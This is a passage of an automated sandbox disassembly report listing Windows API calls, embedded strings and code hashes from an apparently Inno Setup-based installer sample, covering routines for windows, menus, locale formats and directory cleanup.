                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02212BD8,?,?,?,02212BD8,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E36
                                                          • CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02212BD8,?,?,?,02212BD8), ref: 00477E60
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,02212BD8,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E7E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: FileHandle$AddressAttributesCloseCreateModuleProc
                                                          • String ID: GetFinalPathNameByHandleA$kernel32.dll
                                                          • API String ID: 2704155762-2318956294
                                                          • Opcode ID: 174de6e33fe68a4e6b56811a15987559e55e5d15ecccd51d737e8050849857cd
                                                          • Instruction ID: a9b895bb6ebf06323b616d37e9582929c99452ce9f0730db43ffa1519c083574
                                                          • Opcode Fuzzy Hash: 174de6e33fe68a4e6b56811a15987559e55e5d15ecccd51d737e8050849857cd
                                                          • Instruction Fuzzy Hash: D1014551788B0436E52031BA0C82FBB244C8F50729F508177BB5CEE2D3EABC9C0201AE
                                                          APIs
                                                          • GetLastError.KERNEL32(00000000,00459DAE,?,00000000,00000000,00000000,?,00000006,?,00000000,00496D69,?,00000000,00496E0C), ref: 00459CF2
                                                            • Part of subcall function 004543C8: FindClose.KERNEL32(000000FF,004544BE), ref: 004544AD
                                                          Strings
                                                          • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00459CCC
                                                          • Deleting directory: %s, xrefs: 00459C7B
                                                          • Failed to strip read-only attribute., xrefs: 00459CC0
                                                          • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00459D67
                                                          • Stripped read-only attribute., xrefs: 00459CB4
                                                          • Failed to delete directory (%d)., xrefs: 00459D88
                                                          • Failed to delete directory (%d). Will retry later., xrefs: 00459D0B
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CloseErrorFindLast
                                                          • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                          • API String ID: 754982922-1448842058
                                                          • Opcode ID: 98c166b47c72afa297f55e861990155f618f32ac3a66bf902307907fb8e99ae8
                                                          • Instruction ID: cce1cab1201e8728e9bc38508445727295e1911ffe2e7292dd45cd7f335e186b
                                                          • Opcode Fuzzy Hash: 98c166b47c72afa297f55e861990155f618f32ac3a66bf902307907fb8e99ae8
                                                          • Instruction Fuzzy Hash: F9418230A04259DACB04EB6988013AE76F55F4930AF55857FAC0597393D7BC8E0D879A
                                                          APIs
                                                          • GetCapture.USER32 ref: 00422E9C
                                                          • GetCapture.USER32 ref: 00422EAB
                                                          • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EB1
                                                          • ReleaseCapture.USER32 ref: 00422EB6
                                                          • GetActiveWindow.USER32 ref: 00422EC5
                                                          • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F44
                                                          • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FA8
                                                          • GetActiveWindow.USER32 ref: 00422FB7
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CaptureMessageSend$ActiveWindow$Release
                                                          • String ID:
                                                          • API String ID: 862346643-0
                                                          • Opcode ID: b9008f70cee70ce8cdbe9feae850e28bfa4c4446851c9a93175be9357b8d3b25
                                                          • Instruction ID: a831bf89ec3617aa4b81e8a61b28cb02c358a8e939ae68eb352e359643dafe13
                                                          • Opcode Fuzzy Hash: b9008f70cee70ce8cdbe9feae850e28bfa4c4446851c9a93175be9357b8d3b25
                                                          • Instruction Fuzzy Hash: E1414070B00245AFDB10EF69DA46B9E77F1EF48304F5140BAF404AB2A2D7B89E40DB59
                                                          APIs
                                                          • GetWindowLongA.USER32(?,000000F0), ref: 0042F2B2
                                                          • GetWindowLongA.USER32(?,000000EC), ref: 0042F2C9
                                                          • GetActiveWindow.USER32 ref: 0042F2D2
                                                          • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F2FF
                                                          • SetActiveWindow.USER32(?,0042F42F,00000000,?), ref: 0042F320
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Window$ActiveLong$Message
                                                          • String ID:
                                                          • API String ID: 2785966331-0
                                                          • Opcode ID: a223125d65db3de814fb2ac44b456330cdbbeb03ed1e631204e072d19995624a
                                                          • Instruction ID: 9696dc9395d24dec9abacdc10881687288e082ae8fcf9a6a48756090996bfad8
                                                          • Opcode Fuzzy Hash: a223125d65db3de814fb2ac44b456330cdbbeb03ed1e631204e072d19995624a
                                                          • Instruction Fuzzy Hash: A431A171A00714AFDB01EFB9DC52E6E7BF8EB09714B9148BAF804E7291D7389D10CA58
                                                          APIs
                                                          • 73A1A570.USER32(00000000), ref: 00429482
                                                          • GetTextMetricsA.GDI32(00000000), ref: 0042948B
                                                            • Part of subcall function 0041A1E0: CreateFontIndirectA.GDI32(?), ref: 0041A29F
                                                          • SelectObject.GDI32(00000000,00000000), ref: 0042949A
                                                          • GetTextMetricsA.GDI32(00000000,?), ref: 004294A7
                                                          • SelectObject.GDI32(00000000,00000000), ref: 004294AE
                                                          • 73A1A480.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004294B6
                                                          • GetSystemMetrics.USER32(00000006), ref: 004294DB
                                                          • GetSystemMetrics.USER32(00000006), ref: 004294F5
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Metrics$ObjectSelectSystemText$A480A570CreateFontIndirect
                                                          • String ID:
                                                          • API String ID: 361401722-0
                                                          • Opcode ID: 9352f0de83d2aa8ef3dc5e588d401a22e63a3fe7846e7c3b2a64ff92932535c4
                                                          • Instruction ID: 79023d5d76270fc5b80a90959683f08304bbfc9b3a68a0d1de019d9dda53e89a
                                                          • Opcode Fuzzy Hash: 9352f0de83d2aa8ef3dc5e588d401a22e63a3fe7846e7c3b2a64ff92932535c4
                                                          • Instruction Fuzzy Hash: FE01C0A17087503BE311767A9CC6F6F65C8DB44358F84043BF686D63D3D9AC9C81876A
                                                          APIs
                                                          • 73A1A570.USER32(00000000,?,00419051,004980EA), ref: 0041DE1F
                                                          • 73A24620.GDI32(00000000,0000005A,00000000,?,00419051,004980EA), ref: 0041DE29
                                                          • 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,?,00419051,004980EA), ref: 0041DE36
                                                          • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE45
                                                          • GetStockObject.GDI32(00000007), ref: 0041DE53
                                                          • GetStockObject.GDI32(00000005), ref: 0041DE5F
                                                          • GetStockObject.GDI32(0000000D), ref: 0041DE6B
                                                          • LoadIconA.USER32(00000000,00007F00), ref: 0041DE7C
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ObjectStock$A24620A480A570IconLoad
                                                          • String ID:
                                                          • API String ID: 3573811560-0
                                                          • Opcode ID: 710d086b1de04f4d575db38747d659360b557b0cb5838dc09f26a38d22fa0d7e
                                                          • Instruction ID: 462cd7651d9f59a3c1518f9422d26db27efab3bc10fcb75ee14264e6343fb545
                                                          • Opcode Fuzzy Hash: 710d086b1de04f4d575db38747d659360b557b0cb5838dc09f26a38d22fa0d7e
                                                          • Instruction Fuzzy Hash: 0E11EC706456055AE340FFAA6A52BAA3695E724708F00813FF6099F3D1D77D2C444B9F
                                                          APIs
                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0046316C
                                                          • SetCursor.USER32(00000000,00000000,00007F02,00000000,00463201), ref: 00463172
                                                          • SetCursor.USER32(?,004631E9,00007F02,00000000,00463201), ref: 004631DC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Cursor$Load
                                                          • String ID: $ $Internal error: Item already expanding
                                                          • API String ID: 1675784387-1948079669
                                                          • Opcode ID: 18a8c92a23110e1585e61799d78ad50682638d437455fe8a8eac84c2222b077b
                                                          • Instruction ID: 8c03ff8e54c482a295deb11cd31210a84b03b27930917a3eb50de1af6f5dfb0a
                                                          • Opcode Fuzzy Hash: 18a8c92a23110e1585e61799d78ad50682638d437455fe8a8eac84c2222b077b
                                                          • Instruction Fuzzy Hash: A7B1C430A00284DFD711DF69C589B9ABBF1FF04305F1484AAE8459B792EB78EE45CB19
                                                          APIs
                                                          • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453DEB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfileStringWrite
                                                          • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                          • API String ID: 390214022-3304407042
                                                          • Opcode ID: 7a42a0697151d0d5d2c191e5f1412612b4bf9d75eff795acc860741356bb7580
                                                          • Instruction ID: 27719b604a15c88968755e1a1929315a4e70c7568c957628d41e5ea0e69e6a26
                                                          • Opcode Fuzzy Hash: 7a42a0697151d0d5d2c191e5f1412612b4bf9d75eff795acc860741356bb7580
                                                          • Instruction Fuzzy Hash: DD914434E001099BDF11EFA5D882BDEB7F5EF4834AF508066E90077292D778AE49CB58
                                                          APIs
                                                          • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 0047673D
                                                          • 73A259E0.USER32(00000000,000000FC,00476698,00000000,0047697C,?,00000000,004769A6), ref: 00476764
                                                          • GetACP.KERNEL32(00000000,0047697C,?,00000000,004769A6), ref: 004767A1
                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 004767E7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: A259ClassInfoMessageSend
                                                          • String ID: COMBOBOX$Inno Setup: Language
                                                          • API String ID: 3217714596-4234151509
                                                          • Opcode ID: c91c96764c9eb46afea8f4730bcae4c036a3e37d4e33096e95ae453515e7d384
                                                          • Instruction ID: 91173772f4e079f50c7e0c6215708d31291a540b6063389a75a2ac3d3f1b2ee4
                                                          • Opcode Fuzzy Hash: c91c96764c9eb46afea8f4730bcae4c036a3e37d4e33096e95ae453515e7d384
                                                          • Instruction Fuzzy Hash: 68814074A006059FCB10EF69C985AEAB7F5FB09304F56C0BAE808E7362D734AD45CB59
                                                          APIs
                                                          • GetSystemDefaultLCID.KERNEL32(00000000,00408958,?,?,?,?,00000000,00000000,00000000,?,0040995F,00000000,00409972), ref: 0040872A
                                                            • Part of subcall function 00408558: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408623,?,00000000,00408702), ref: 00408576
                                                            • Part of subcall function 004085A4: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087A6,?,?,?,00000000,00408958), ref: 004085B7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: InfoLocale$DefaultSystem
                                                          • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                          • API String ID: 1044490935-665933166
                                                          • Opcode ID: e4d4874023cbce5b0e58a93798fb9a357b254c43991a542c79008375c0b91d34
                                                          • Instruction ID: acf8fabd4b29bc0114a799655761a3ccdfd58ddc6ec536e3fe46e21ad76a8ffd
                                                          • Opcode Fuzzy Hash: e4d4874023cbce5b0e58a93798fb9a357b254c43991a542c79008375c0b91d34
                                                          • Instruction Fuzzy Hash: 85515C24B001486BDB00FBA99E91A9E77A9DB84308F50C47FA151BB3C7CE3CDA05975D
                                                          APIs
                                                          • GetVersion.KERNEL32(00000000,004118F1), ref: 00411784
                                                          • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 00411842
                                                            • Part of subcall function 00411AA4: CreatePopupMenu.USER32 ref: 00411ABE
                                                          • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118CE
                                                            • Part of subcall function 00411AA4: CreateMenu.USER32 ref: 00411AC8
                                                          • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118B5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Menu$Insert$Create$ItemPopupVersion
                                                          • String ID: ,$?
                                                          • API String ID: 2359071979-2308483597
                                                          • Opcode ID: e0c9a44165d56187b0795cac699610ea385af12d5fd7003569757b390febdefd
                                                          • Instruction ID: d8c93b49542c4992b593f331124e59532eba8c65ca5fe63237d6ba0ca55a8ecc
                                                          • Opcode Fuzzy Hash: e0c9a44165d56187b0795cac699610ea385af12d5fd7003569757b390febdefd
                                                          • Instruction Fuzzy Hash: 9E510370A00245ABDB10EF6ADD816EA7BF9AF09304B15857BF904E73A2D738DD41CB58
                                                          APIs
                                                          • GetObjectA.GDI32(?,00000018,?), ref: 0041BF20
                                                          • GetObjectA.GDI32(?,00000018,?), ref: 0041BF2F
                                                          • GetBitmapBits.GDI32(?,?,?), ref: 0041BF80
                                                          • GetBitmapBits.GDI32(?,?,?), ref: 0041BF8E
                                                          • DeleteObject.GDI32(?), ref: 0041BF97
                                                          • DeleteObject.GDI32(?), ref: 0041BFA0
                                                          • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFBD
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Object$BitmapBitsDelete$CreateIcon
                                                          • String ID:
                                                          • API String ID: 1030595962-0
                                                          • Opcode ID: a6b868a807f1f599719e52264ea8325182c659afeabb6b194134e5b91d426331
                                                          • Instruction ID: 4619fcafd17693633a8c31a92518bd0abdf88944d34ea3f3446ff31194e2e661
                                                          • Opcode Fuzzy Hash: a6b868a807f1f599719e52264ea8325182c659afeabb6b194134e5b91d426331
                                                          • Instruction Fuzzy Hash: 48510375A00219AFCF10DFA9C8819EEB7F9EF48314B11856AF914E7391D738AD81CB64
                                                          APIs
                                                          • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CEF6
                                                          • 73A24620.GDI32(00000000,00000026), ref: 0041CF15
                                                          • 73A18830.GDI32(?,?,00000001,00000000,00000026), ref: 0041CF7B
                                                          • 73A122A0.GDI32(?,?,?,00000001,00000000,00000026), ref: 0041CF8A
                                                          • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041CFF4
                                                          • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D032
                                                          • 73A18830.GDI32(?,?,00000001,0041D064,00000000,00000026), ref: 0041D057
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Stretch$A18830$A122A24620BitsMode
                                                          • String ID:
                                                          • API String ID: 430401518-0
                                                          • Opcode ID: c81279b313576d135e7f058ec71da99c22708ae42f226878f0d4e896de0476ba
                                                          • Instruction ID: 9b717f45caa71cbdb3d7743a5068819f31981c945c02765ea0762fde20f1409d
                                                          • Opcode Fuzzy Hash: c81279b313576d135e7f058ec71da99c22708ae42f226878f0d4e896de0476ba
                                                          • Instruction Fuzzy Hash: 17513F70604204AFDB14DFA8C985F9BBBF9EF08304F14459AB545E7692C778ED81CB58
                                                          APIs
                                                          • SendMessageA.USER32(00000000,?,?), ref: 0045714E
                                                            • Part of subcall function 00424274: GetWindowTextA.USER32(?,?,00000100), ref: 00424294
                                                            • Part of subcall function 0041EE9C: GetCurrentThreadId.KERNEL32 ref: 0041EEEB
                                                            • Part of subcall function 0041EE9C: 73A25940.USER32(00000000,0041EE4C,00000000,00000000,0041EF08,?,00000000,0041EF3F,?,0042EEA8,?,00000001), ref: 0041EEF1
                                                            • Part of subcall function 004242BC: SetWindowTextA.USER32(?,00000000), ref: 004242D4
                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004571B5
                                                          • TranslateMessage.USER32(?), ref: 004571D3
                                                          • DispatchMessageA.USER32(?), ref: 004571DC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Message$TextWindow$A25940CurrentDispatchSendThreadTranslate
                                                          • String ID: [Paused]
                                                          • API String ID: 3047529653-4230553315
                                                          • Opcode ID: 80c4c27c4b754fe1519de729eb729efa4ffa2fc2b03d19605f480c373ee661fa
                                                          • Instruction ID: 4dd0f6a69861fba71970a0c95394483262e0630457e8f7cd4854214566cc162d
                                                          • Opcode Fuzzy Hash: 80c4c27c4b754fe1519de729eb729efa4ffa2fc2b03d19605f480c373ee661fa
                                                          • Instruction Fuzzy Hash: EC3196319082449EDB11DFB5EC81B9E7FB8EB49314F5544BBF800E7292D63C9909CB69
                                                          APIs
                                                          • GetCursor.USER32(00000000,0046B37F), ref: 0046B2FC
                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0046B30A
                                                          • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046B37F), ref: 0046B310
                                                          • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046B37F), ref: 0046B31A
                                                          • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046B37F), ref: 0046B320
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Cursor$LoadSleep
                                                          • String ID: CheckPassword
                                                          • API String ID: 4023313301-1302249611
                                                          • Opcode ID: c5bdf5f640806f8796bfbc41b1a4ab00d3ded5bef946e97f85f4201d994c149c
                                                          • Instruction ID: dcef8ef75e700f151948083f515970cfb06be99f29bdf3d7051495a11b4a934f
                                                          • Opcode Fuzzy Hash: c5bdf5f640806f8796bfbc41b1a4ab00d3ded5bef946e97f85f4201d994c149c
                                                          • Instruction Fuzzy Hash: 9D3190347402049FD701EF69C899B9E7BE4EB49304F5580B6B904DB3A2E7789E80CB89
                                                          APIs
                                                            • Part of subcall function 00477628: GetWindowThreadProcessId.USER32(00000000), ref: 00477630
                                                            • Part of subcall function 00477628: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477727,0049C0A4,00000000), ref: 00477643
                                                            • Part of subcall function 00477628: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477649
                                                          • SendMessageA.USER32(00000000,0000004A,00000000,00477ABA), ref: 00477735
                                                          • GetTickCount.KERNEL32 ref: 0047777A
                                                          • GetTickCount.KERNEL32 ref: 00477784
